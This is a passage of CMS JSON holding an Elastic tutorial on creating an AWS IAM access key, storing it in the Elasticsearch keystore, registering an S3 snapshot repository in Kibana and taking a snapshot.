12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs3c8c61477cfa8594"}}},{"image":{"image":{"uid":"blt8b894162454de90c","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:51:26.815Z","created_by":"bltb6c155cd84fc0c1a","file_size":"287399","filename":"5.png","parent_uid":null,"tags":[],"title":"5.png","updated_at":"2024-11-21T00:51:26.815Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:01.194Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8b894162454de90c/673e840eb5054cb08c323a7b/5.png"},"_metadata":{"uid":"cs712f23ec7abd34bb"},"caption_l10n":"","alt_text_l10n":"5 - summary","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7dc52939b15d099b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis directs us to the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCreate access key\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e flow under \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStep 1: Access key best practices \u0026amp; alternatives\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1cba0f13c7d3e42d"}}},{"image":{"image":{"uid":"bltd808b1c1bed6ac16","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:51:37.036Z","created_by":"bltb6c155cd84fc0c1a","file_size":"278673","filename":"6.png","parent_uid":null,"tags":[],"title":"6.png","updated_at":"2024-11-21T00:51:37.036Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:01.039Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd808b1c1bed6ac16/673e8419bd749ab329f132ce/6.png"},"_metadata":{"uid":"cs7690fdfc9caaf20f"},"caption_l10n":"","alt_text_l10n":"6 - Access key best practices \u0026 alternatives","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7220bdfa5d106803"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eUse case\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, we will select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eThird-party service\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and then click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNext\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. This takes us to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStep 2 - optional: Set description tag\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e which we’ll skip through by clicking \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNext\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e again, bringing us to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStep 3: Retrieve access keys\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1165c26d58490415"}}},{"image":{"image":{"uid":"blt210f7733521341b5","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:51:45.233Z","created_by":"bltb6c155cd84fc0c1a","file_size":"265137","filename":"7.png","parent_uid":null,"tags":[],"title":"7.png","updated_at":"2024-11-21T00:51:45.233Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:01.006Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt210f7733521341b5/673e84217ca3b533a741afa6/7.png"},"_metadata":{"uid":"csa22edb4533c90183"},"caption_l10n":"","alt_text_l10n":"7 - retrieve access key","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb7bb5398c6671c31"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe will securely store our IAM user’s new access and secret keys.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Connect to deployment","_metadata":{"uid":"csb247f6775f7d697f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe will add these IAM user access and secret keys to our Elastic Cloud deployment.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csce06dcc7fc8d41bb"}}},{"image":{"image":{"uid":"bltf37f97d1969e347e","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:51:51.410Z","created_by":"bltb6c155cd84fc0c1a","file_size":"256475","filename":"8.png","parent_uid":null,"tags":[],"title":"8.png","updated_at":"2024-11-21T00:51:51.410Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:00.946Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf37f97d1969e347e/673e842796fb4113dd103ea5/8.png"},"_metadata":{"uid":"cs94a1c61de7cbdf08"},"caption_l10n":"","alt_text_l10n":"8 - create setting ","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs766d0ca3d80bf376"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUnder our deployment’s \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-security.html\"\u003e\u003cspan style='font-size: 12pt;'\u003esecurity tab\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, we will navigate to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/elasticsearch-keystore.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eelasticsearch-keystore\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAdd settings\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. In case there are multiple access and secret key pairs for separate S3 repository connections, the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/repository-s3.html#repository-s3-client\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch S3 repository JSON\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e maps our access and secret keys via a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eclient\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e string. Our IAM User’s access key will be the value of \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003es3.client.CLIENT_NAME.access_key\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and secret key will be the value of \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003es3.client.CLIENT_NAME.secret_key\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, where \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eCLIENT_NAME\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e is a placeholder for that S3 JSON mapping’s \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eclient\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e value. Because the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eclient\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e defaults to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003edefault\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, we will use the same for our example, so our access and secret values to insert under \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSetting name\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e will be stored under keys \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003es3.client.default.access_key\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003es3.client.default.secret_key\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003erespectively.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5309b72e84ae7bf7"}}},{"image":{"image":{"uid":"bltc1ce6b7894b62b18","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:51:59.369Z","created_by":"bltb6c155cd84fc0c1a","file_size":"278406","filename":"9.png","parent_uid":null,"tags":[],"title":"9.png","updated_at":"2024-11-21T00:51:59.369Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:01.123Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc1ce6b7894b62b18/673e842fd64c229a2fca290c/9.png"},"_metadata":{"uid":"cs8040fc9a7890ff62"},"caption_l10n":"","alt_text_l10n":"9 - security keys","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs63e2faa3efbf62f1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce added, our keys will show under \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSecurity keys\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. For security, our keystore values cannot be viewed nor edited after adding — only removed to recreate.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Create repository connection","_metadata":{"uid":"csb4258f165c6fcdfb"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe will now register our AWS S3 Elasticsearch repository via \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/index.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eKibana\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. We will load our secure settings into our cluster by running \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/cluster-nodes-reload-secure-settings.html\"\u003e\u003cspan style='font-size: 12pt;'\u003enode reload secure settings\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e under \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/master/console-kibana.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eDev Tools\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2a8cc56746942d87"}}},{"image":{"image":{"uid":"blt385ef245e53f61a5","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:52:07.890Z","created_by":"bltb6c155cd84fc0c1a","file_size":"333122","filename":"10.png","parent_uid":null,"tags":[],"title":"10.png","updated_at":"2024-11-21T00:52:07.890Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:01.205Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt385ef245e53f61a5/673e8437ed994467b7a61ed7/10.png"},"_metadata":{"uid":"cs74d2aec175198060"},"caption_l10n":"","alt_text_l10n":"10 - Create repository connection","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5e76934170dd91f6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eA successful response will emit \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e_nodes.failed: 0\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. Our access and secret keystore pair are now added into Elasticsearch, so we can now register our AWS S3 repository. We will then navigate to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSnapshot and Restore \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eunder \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/master/management.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStack Management\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and click into the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eRepositories\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e tab, then select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eRegister a Repository\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc01957393b8b8d73"}}},{"image":{"image":{"uid":"blt9964a2fd18e0fade","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:52:15.732Z","created_by":"bltb6c155cd84fc0c1a","file_size":"228214","filename":"11.png","parent_uid":null,"tags":[],"title":"11.png","updated_at":"2024-11-21T00:52:15.732Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:01.049Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9964a2fd18e0fade/673e843fa441bc2cf5c88f74/11.png"},"_metadata":{"uid":"cs8d68f2219b3cbe7d"},"caption_l10n":"","alt_text_l10n":"11 - Register a Repository","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs02e5493b235ec6f0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe will give our repository a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eName\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and select a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eRepository Type\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e of \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAWS S3\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. For our example, our repository name is \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eaws_s3\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. Kindly note that while most Elasticsearch features like Allocation load data from the repository based on its stored \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003euuid\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e once initially registered, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-snapshot-repo-api.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eILM searchable snapshots\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e do use the repository \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ename\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e as an identifier. This will need to be lined up across Elasticsearch clusters when migrating \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/searchable-snapshots.html\"\u003e\u003cspan style='font-size: 12pt;'\u003esearchable snapshot\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e data.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2f5305544d6de1ec"}}},{"image":{"image":{"uid":"blt17bc7997802266af","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:52:24.114Z","created_by":"bltb6c155cd84fc0c1a","file_size":"281063","filename":"12.png","parent_uid":null,"tags":[],"title":"12.png","updated_at":"2024-11-21T00:52:24.114Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:01.018Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt17bc7997802266af/673e8448a1f5a2255f04a59f/12.png"},"_metadata":{"uid":"cs8a3760905809d22a"},"caption_l10n":"","alt_text_l10n":"12 - Repository Type of AWS S3","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs445c5fcd2eb1a9d1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUnder \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eRegister repository\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, add our \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eBucket\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e name \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003es3-custom-repository-demo-bucket\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, leave all other options at their defaults, and select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSave\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. For our example, we will leave the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eClient\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e empty in order to default to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003edefault\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to match our Elasticsearch keystore \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eCLIENT_NAME\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. Kindly note that \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/snapshots-register-repository.html#snapshot-repo-considerations\"\u003e\u003cspan style='font-size: 12pt;'\u003eonly one read-write connection from one Elasticsearch cluster\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e should be acting on a repository at a time; as needed, make sure to flag \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ereadonly\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to avoid accidental data overwriting or corruption. This will take us to the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eaws_s3\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e repository overview UI drawer.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csf114ecd4ec213730"}}},{"image":{"image":{"uid":"bltb1fe18f23ca014fe","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:52:30.666Z","created_by":"bltb6c155cd84fc0c1a","file_size":"240980","filename":"13.png","parent_uid":null,"tags":[],"title":"13.png","updated_at":"2024-11-21T00:52:30.666Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:00.957Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb1fe18f23ca014fe/673e844e554dc3664ec6a64c/13.png"},"_metadata":{"uid":"cs5e21ac3525d39ff5"},"caption_l10n":"","alt_text_l10n":"13 - snapshot and restore","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5cd3c35c6ea3496f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHere we can select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eVerify repository\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e under \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eVerification status\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to confirm that all nodes can connect to our AWS S3 bucket and pass initial verification checks. We can also run this same test from \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDev Tools\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/verify-snapshot-repo-api.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003everify snapshot repository\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs39f75e290053b163"}}},{"image":{"image":{"uid":"blt9b58bef09f4fdeac","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:52:38.966Z","created_by":"bltb6c155cd84fc0c1a","file_size":"132378","filename":"14.png","parent_uid":null,"tags":[],"title":"14.png","updated_at":"2024-11-21T00:52:38.966Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:01.133Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9b58bef09f4fdeac/673e8456a491d703dafd8f6d/14.png"},"_metadata":{"uid":"cs3745ea1a363f0414"},"caption_l10n":"","alt_text_l10n":"14 - verify snapshot repository","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs75f4a4cc351f8afb"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBoth of these outputs return the same list of nodes successfully connected to our AWS S3 bucket.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Capture snapshot","_metadata":{"uid":"csed460f2bb4b090dc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe are now ready to backup a snapshot of our committed Elasticsearch cluster into our AWS S3 bucket. Kindly note that Elastic Cloud’s built-in repository \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003efound-snapshots\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-snapshot-restore.html\"\u003e\u003cspan style='font-size: 12pt;'\u003etakes periodic backups\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e as well via Elasticearch’s \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/master/snapshots-take-snapshot.html#automate-snapshots-slm\"\u003e\u003cspan style='font-size: 12pt;'\u003esnapshot lifecycle management\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. We will run \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/create-snapshot-api.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ecreate snapshot\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7228659eb95cf49a"}}},{"image":{"image":{"uid":"bltaf62f2aa2ca2fa27","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:53:59.097Z","created_by":"bltb6c155cd84fc0c1a","file_size":"450894","filename":"15.png","parent_uid":null,"tags":[],"title":"15.png","updated_at":"2024-11-21T00:53:59.097Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:01.217Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltaf62f2aa2ca2fa27/673e84a74ba87627a75aba72/15.png"},"_metadata":{"uid":"cs2a3753ed61caf2cb"},"caption_l10n":"","alt_text_l10n":"15 - create snapshot","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc99d46912a16adc8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur example snapshot name is \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ebats\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. The resulting snapshot reported \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003estate: SUCCESS\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. We can confirm results by navigating back to our AWS S3 bucket \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003es3-custom-repository-demo-bucket\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e which shows Elasticsearch added files and subfolders into our root directory.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs28e3232192fd58ea"}}},{"image":{"image":{"uid":"bltc12abd6ff97c3de7","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:54:13.976Z","created_by":"bltb6c155cd84fc0c1a","file_size":"337496","filename":"16.png","parent_uid":null,"tags":[],"title":"16.png","updated_at":"2024-11-21T00:54:13.976Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:01.102Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc12abd6ff97c3de7/673e84b546ab883081ba9e5b/16.png"},"_metadata":{"uid":"cs39fc2695ae7bfda7"},"caption_l10n":"","alt_text_l10n":"16 - navigating back to our AWS S3 bucket s3-custom-repository-demo-bucket","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1431e0b64536fe62"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe did it! Check out \u003c/span\u003e\u003ca href=\"https://www.youtube.com/watch?v=ACqfyzWf-xs\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ethis video\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e for a walkthrough of the steps above.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAs desired at this point, we can set up \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/master/snapshots-take-snapshot.html#automate-snapshots-slm\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003esnapshot lifecycle management\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to take period snapshots and manage snapshot retention. Alternatively, we could disconnect our AWS S3 repository to connect it to a different Elasticsearch cluster to migrate this newly snapshot 